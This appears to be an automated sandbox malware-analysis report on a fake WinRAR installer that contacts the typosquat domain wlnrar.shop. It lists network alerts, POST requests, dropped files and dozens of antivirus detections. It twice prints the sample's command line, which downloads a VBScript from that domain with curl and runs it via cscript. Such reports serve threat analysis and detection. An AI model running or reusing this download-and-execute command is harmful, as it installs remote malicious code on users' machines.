Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 13, 2024, 9:21 a.m. | Sept. 13, 2024, 9:27 a.m. |
-
-
winrar-x64-701ru.exe "C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe"
2284
Name | Response | Post-Analysis Lookup |
---|---|---|
wlnrar.shop | 172.67.177.42 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49166 -> 104.21.80.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49166 104.21.80.99:443 |
C=US, O=Google Trust Services, CN=WE1 | CN=wlnrar.shop | c3:1e:19:20:23:a4:65:b7:fb:17:e6:2e:ea:ed:ba:88:88:97:78:7e |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb |
section | .didat |
section | _RDATA |
resource name | PNG |
suspicious_features | POST method with no referer header | suspicious_request | POST https://wlnrar.shop/json.php |
request | POST https://wlnrar.shop/json.php |
request | POST https://wlnrar.shop/json.php |
file | C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe |
file | C:\Users\test22\AppData\Local\Temp\winrar-info.exe |
cmdline | cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs |
cmdline | cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs |
file | C:\Users\test22\AppData\Local\Temp\winrar-info.exe |
file | C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
cmdline | C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe |
cmdline | "C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe" |
dead_host | 192.168.56.103:49171 |
Bkav | W64.AIDetectMalware |
Lionic | Trojan.Win32.Generic.4!c |
Elastic | malicious (high confidence) |
Cynet | Malicious (score: 100) |
McAfee | Artemis!AF91873C641A |
Cylance | Unsafe |
VIPRE | Trojan.GenericKD.74038315 |
Sangfor | Trojan.Win64.Agent.V39d |
BitDefender | Trojan.GenericKD.74038315 |
Arcabit | Trojan.Generic.D469BC2B |
Symantec | Trojan.Gen.MBT |
ESET-NOD32 | Win64/Agent.ELP |
APEX | Malicious |
Avast | Win64:Evo-gen [Trj] |
ClamAV | Win.Dropper.Nanocore-9986456-0 |
Kaspersky | UDS:DangerousObject.Multi.Generic |
MicroWorld-eScan | Trojan.GenericKD.74038315 |
Rising | Trojan.Agent!8.B1E (CLOUD) |
Emsisoft | Trojan.GenericKD.74038315 (B) |
Zillya | Exploit.UAC.Win32.999 |
McAfeeD | ti!F568D5C96EEF |
CTX | exe.trojan.generic |
Sophos | Generic Reputation PUA (PUA) |
FireEye | Trojan.GenericKD.74038315 |
Jiangmin | Worm.MSIL.vpw |
Detected | |
Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
ZoneAlarm | UDS:DangerousObject.Multi.Generic |
GData | Trojan.GenericKD.74038315 |
DeepInstinct | MALICIOUS |
Malwarebytes | Generic.Malware/Suspicious |
Ikarus | Trojan.Win64.Agent |
TrendMicro-HouseCall | Trojan.Win64.AMADEY.YXEILZ |
Tencent | Win64.Trojan.Agent.Ncnw |
AVG | Win64:Evo-gen [Trj] |
Paloalto | generic.ml |
CrowdStrike | win/malicious_confidence_70% (D) |
alibabacloud | Trojan:Win/Caypnamer.A9nj |